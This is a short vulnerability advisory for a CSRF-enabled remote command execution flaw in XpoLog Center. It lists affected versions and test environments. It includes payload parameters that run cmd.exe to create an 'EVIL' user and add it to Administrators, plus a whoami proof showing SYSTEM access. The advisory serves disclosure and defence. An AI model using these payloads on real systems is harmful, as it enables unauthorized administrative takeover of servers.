XpoLog Center V6 CSRF Remote Command Execution Vendor: XpoLog LTD Product web page: http://www.xpolog.com Affected version: 6.4469 6.4254 6.4252 6.4250 6.4237 6.4235 5.4018 Summary: Applications Log Analysis and Management Platform. Desc: XpoLog suffers from arbitrary command execution. Attackers can exploit this issue using the task tool feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF an attacker can execute system commands with SYSTEM privileges. Tested on: Apache-Coyote/1.1 Microsoft Windows Server 2012 Microsoft Windows 7 Professional SP1 EN 64bit Java/1.7.0_45 Java/ Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5335 Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php 14.06.2016 -- exePath = "C:\\windows\\system32\\cmd.exe" exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
-- exePath = "C:\\windows\\system32\\cmd.exe" exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt" GET Response: nt authority\system